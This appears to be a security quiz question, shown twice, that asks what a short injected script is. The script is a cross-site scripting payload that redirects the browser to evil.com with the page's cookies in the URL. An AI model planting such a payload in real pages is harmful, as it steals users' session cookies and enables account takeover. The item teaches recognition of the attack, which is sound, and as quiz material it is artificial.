🔒Securityintermediate
Question 1 of 10
<script>
document.location =
'https://evil.com?c=' + document.cookie
</script>
// If injected, this is?What's the output?
Question 1 of 10
<script>
document.location =
'https://evil.com?c=' + document.cookie
</script>
// If injected, this is?What's the output?